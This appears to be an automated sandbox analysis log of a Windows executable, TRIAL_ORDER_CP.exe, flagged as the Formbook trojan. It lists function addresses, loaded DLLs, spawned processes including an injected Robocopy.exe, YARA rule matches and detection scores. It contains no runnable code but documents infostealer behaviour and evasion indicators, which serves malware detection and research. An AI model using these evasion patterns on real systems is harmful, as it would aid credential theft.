        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BDA6C03_2_33BDA6C0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBD62C3_2_33BBD62C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3C6003_2_33B3C600
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B446703_2_33B44670
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BCD6463_2_33BCD646
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BDF5C93_2_33BDF5C9
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BD75C63_2_33BD75C6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BEA5263_2_33BEA526
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B8D4803_2_33B8D480
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B204453_2_33B20445
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B94BC03_2_33B94BC0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BDFB2E3_2_33BDFB2E
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B20B103_2_33B20B10
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B5DB193_2_33B5DB19
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3FAA03_2_33B3FAA0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BDFA893_2_33BDFA89
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BDCA133_2_33BDCA13
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BDEA5B3_2_33BDEA5B
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1E9A03_2_33B1E9A0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BDE9A63_2_33BDE9A6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B659C03_2_33B659C0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B998B23_2_33B998B2
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B368823_2_33B36882
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BD78F33_2_33BD78F3
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BD18DA3_2_33BD18DA
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B228C03_2_33B228C0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BC08353_2_33BC0835
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B4E8103_2_33B4E810
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B238003_2_33B23800
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B298703_2_33B29870
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3B8703_2_33B3B870
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BDF8723_2_33BDF872
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B068683_2_33B06868
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BDEFBF3_2_33BDEFBF
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B26FE03_2_33B26FE0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BD1FC63_2_33BD1FC6
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B2CF003_2_33B2CF00
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BDFF633_2_33BDFF63
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B21EB23_2_33B21EB2
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BD0EAD3_2_33BD0EAD
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B12EE83_2_33B12EE8
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BD9ED23_2_33BD9ED2
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BC0E6D3_2_33BC0E6D
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B40E503_2_33B40E50
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B62E483_2_33B62E48
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B32DB03_2_33B32DB0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BBFDF43_2_33BBFDF4
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B29DD03_2_33B29DD0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BDFD273_2_33BDFD27
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B1AD003_2_33B1AD00
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B20D693_2_33B20D69
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BD7D4C3_2_33BD7D4C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BB9C983_2_33BB9C98
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B3FCE03_2_33B3FCE0
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BEACEB3_2_33BEACEB
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B38CDF3_2_33B38CDF
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B2AC203_2_33B2AC20
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B10C123_2_33B10C12
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33B23C603_2_33B23C60
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BD6C693_2_33BD6C69
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BDEC603_2_33BDEC60
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_33BCEC4C3_2_33BCEC4C
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_3380E3053_2_3380E305
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_3380D8283_2_3380D828
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_3380E7BC3_2_3380E7BC
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 3_2_3380E4243_2_3380E424
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_0474C0665_2_0474C066
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_0474CC625_2_0474CC62
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_0474CB435_2_0474CB43
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_0474CFFA5_2_0474CFFA
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045704456_2_04570445
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045DD4806_2_045DD480
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0463A5266_2_0463A526
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046275C66_2_046275C6
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462F5C96_2_0462F5C9
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0461D6466_2_0461D646
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045946706_2_04594670
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0460D62C6_2_0460D62C
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0458C6006_2_0458C600
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462F6F66_2_0462F6F6
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462A6C06_2_0462A6C0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045E36EC6_2_045E36EC
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0456C6E06_2_0456C6E0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045706806_2_04570680
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046267576_2_04626757
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045727606_2_04572760
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0457A7606_2_0457A760
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0461E0766_2_0461E076
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0457B0D06_2_0457B0D0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046270F16_2_046270F1
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045A508C6_2_045A508C
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045600A06_2_045600A0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045B717A6_2_045B717A
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0455F1136_2_0455F113
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0460D1306_2_0460D130
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0463010E6_2_0463010E
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045751C06_2_045751C0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0458B1E06_2_0458B1E0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462124C6_2_0462124C
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0455D2EC6_2_0455D2EC
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0457E3106_2_0457E310
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462F3306_2_0462F330
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045613806_2_04561380
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462EC606_2_0462EC60
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04626C696_2_04626C69
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0461EC4C6_2_0461EC4C
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04573C606_2_04573C60
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04560C126_2_04560C12
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0457AC206_2_0457AC20
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04588CDF6_2_04588CDF
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0463ACEB6_2_0463ACEB
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0458FCE06_2_0458FCE0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04609C986_2_04609C98
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04627D4C6_2_04627D4C
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04570D696_2_04570D69
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462FD276_2_0462FD27
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0456AD006_2_0456AD00
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04579DD06_2_04579DD0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0460FDF46_2_0460FDF4
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04582DB06_2_04582DB0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04590E506_2_04590E50
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04610E6D6_2_04610E6D
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045B2E486_2_045B2E48
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04629ED26_2_04629ED2
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04562EE86_2_04562EE8
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04620EAD6_2_04620EAD
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04571EB26_2_04571EB2
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462FF636_2_0462FF63
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0457CF006_2_0457CF00
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04621FC66_2_04621FC6
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04576FE06_2_04576FE0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462EFBF6_2_0462EFBF
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462F8726_2_0462F872
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045798706_2_04579870
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0458B8706_2_0458B870
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045E58706_2_045E5870
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045568686_2_04556868
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0459E8106_2_0459E810
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046108356_2_04610835
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045738006_2_04573800
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046278F36_2_046278F3
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045728C06_2_045728C0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_046218DA6_2_046218DA
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045868826_2_04586882
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045E98B26_2_045E98B2
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045B59C06_2_045B59C0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462E9A66_2_0462E9A6
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0456E9A06_2_0456E9A0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462EA5B6_2_0462EA5B
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462CA136_2_0462CA13
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462FA896_2_0462FA89
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0458FAA06_2_0458FAA0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045ADB196_2_045ADB19
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_04570B106_2_04570B10
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0462FB2E6_2_0462FB2E
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_045E4BC06_2_045E4BC0
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0488EFDA6_2_0488EFDA
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0488E4246_2_0488E424
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0488E7BC6_2_0488E7BC
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0488D8286_2_0488D828
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 6_2_0488E3056_2_0488E305
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: String function: 33B9EF10 appears 105 times
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: String function: 33B67BE4 appears 88 times
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: String function: 33B0B910 appears 266 times
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: String function: 33B8E692 appears 84 times
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: String function: 33B55050 appears 36 times
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: String function: 045A5050 appears 36 times
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: String function: 045B7BE4 appears 95 times
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: String function: 0455B910 appears 268 times
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: String function: 045DE692 appears 86 times
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: String function: 045EEF10 appears 105 times
        Source: TRIAL_ORDER_CP.exe, 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TRIAL_ORDER_CP.exe
        Source: TRIAL_ORDER_CP.exe, 00000003.00000002.270972182886.0000000033DB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TRIAL_ORDER_CP.exe
        Source: TRIAL_ORDER_CP.exe, 00000003.00000002.270960780769.0000000003824000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamerobocopy.exej% vs TRIAL_ORDER_CP.exe
        Source: TRIAL_ORDER_CP.exe, 00000003.00000002.270960780769.0000000003873000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamerobocopy.exej% vs TRIAL_ORDER_CP.exe
        Source: TRIAL_ORDER_CP.exe, 00000003.00000003.270875655699.0000000033A59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TRIAL_ORDER_CP.exe
        Source: TRIAL_ORDER_CP.exe, 00000003.00000003.270872760726.000000003389B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TRIAL_ORDER_CP.exe
        Source: TRIAL_ORDER_CP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000006.00000002.272502680086.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000006.00000002.272502162049.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.270972099407.0000000033830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.evad.winEXE@5/13@1/1
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 0_2_0040352F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352F
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeFile created: C:\Users\user\AppData\Local\Temp\nsp13E5.tmpJump to behavior
        Source: TRIAL_ORDER_CP.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: TRIAL_ORDER_CP.exeReversingLabs: Detection: 26%
        Source: TRIAL_ORDER_CP.exeVirustotal: Detection: 42%
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeFile read: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe "C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeProcess created: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe "C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\Robocopy.exe "C:\Windows\SysWOW64\Robocopy.exe"
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeProcess created: C:\Users\user\Desktop\TRIAL_ORDER_CP.exe "C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\Robocopy.exe "C:\Windows\SysWOW64\Robocopy.exe"Jump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\Robocopy.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: TRIAL_ORDER_CP.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: mshtml.pdb source: TRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.0000000000649000.00000020.00000001.01000000.0000000B.sdmp
        Source: Binary string: robocopy.pdb source: TRIAL_ORDER_CP.exe, 00000003.00000002.270960780769.0000000003824000.00000004.00000020.00020000.00000000.sdmp
